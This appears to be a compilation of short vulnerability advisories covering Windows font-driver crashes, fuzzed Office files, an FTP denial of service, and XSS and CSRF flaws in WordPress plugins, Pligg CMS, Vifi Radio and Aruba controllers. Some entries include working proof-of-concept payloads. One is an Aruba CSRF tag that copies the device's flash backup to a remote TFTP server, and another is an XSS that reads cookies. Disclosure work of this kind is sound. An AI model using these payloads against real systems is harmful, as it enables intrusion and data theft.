A vulnerability in the Windows kernel's ATMFD.DLL OpenType driver allows for a denial of service attack when processing corrupted OTF font files. The vulnerability is triggered when the driver attempts to access memory that has already been freed, resulting in a DRIVER_PAGE_FAULT_IN_FREED_SPECIAL_POOL (d5) bugcheck.
We have encountered a Windows kernel crash in the win32k!fsc_RemoveDups function while processing corrupted TTF font files. The crash occurs due to a PAGE_FAULT_IN_NONPAGED_AREA (50) error. The address referenced is ff6e7000 and the instruction address which referenced the bad memory address is 91e809df.
A crash was observed in MS Office 2007 running under Windows 2003 x86. Microsoft Office File Validation Add-In was disabled and application verified was enabled for testing and reproduction. This sample did not reproduce in Office 2010 running on Windows 7 x86. The attached minimized PoC that produces the crash with 2 bit changes from the original file at offsets 0x11E60 and 0x1515F. Standard office document parsers did not reveal any significance about this location.
The crash is caused by a 1 bit delta from the original file at offset 0x31B. OffViz identified this offset as WordBinaryDocuments[1].WordBinaryDocument[0].WordFIB.FIBTable97.fcPlcfFldMom with an original value of 0x000072C6 and a fuzzed value of 0x00007AC6.
This exploit sends a crafted packet of a certain length to the remote FTP server, appending it to the USER command and requesting the remote FTP server denies requests for other legitimate users.
The 'message' field doesn't sanitize input, allowing a less privileged user (Editor, Author, etc.) to execute an XSS attack against an Administrator. Place <script>alert('Hello!')</script> in the message field of a private message and then submit. Open the message and the alert window will fire.
WordPress Googmonify Plugin version 0.8.1 is vulnerable to Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF). The vulnerability exists due to insufficient sanitization of user-supplied input in the 'PID', 'Limit' and 'AID' parameters of the 'googmonify.php' script. An attacker can exploit this vulnerability to inject malicious JavaScript code into the application and execute it in the browser of an unsuspecting user in the context of the vulnerable website.
Pligg CMS is a CMS written in PHP language and licensed under GPL v 2.0. In Pligg CMS panel in adding page section, Pligg CMS allows the admin to add PHP codes in {php} {/php} tags. A CSRF vulnerability in adding page section allows the attacker to execute PHP codes on the server. In this exploit, a 'echo '<h1> Hacked </h1>';' code is added. After the HTML file is executed, the page can be accessed at http://localhost/pligg-cms/page.php?page=Hacked.
Vifi Radio v1 is vulnerable to CSRF (Cross-Site Request Forgery) which allows an attacker to change the password of any user without their knowledge. An attacker can craft a malicious HTML page containing a form with hidden fields and submit it to the vulnerable application. This will cause the application to change the password of the user without their knowledge or consent.
Aruba Networks is an HP company, one of the leaders in enterprise Wi-Fi. Arube Controller suffers from CSRF and XSS vulnerabilities. Proof of Concept - CSRF: 192.168.0.1 - Controller IP-Address 172.17.0.1 - Remote TFTP server <IMG width=1 height=1 SRC="'https://192.168.0.1:4343/screens/cmnutil/copyLocalFileToTftpServerWeb.xml?flashbackup.tar.gz,172.17.0.1,flashbackup.tar.gz'"> Proof of Concept - XSS: https://192.168.0.1:4343/screens/switch/switch_mon.html?mode=plog-custom&mode-title=test</td><img width=1 height=1 src=/images/logo-mobility-controller.gif onLOAD=alert(document.cookie)>
Services By CQR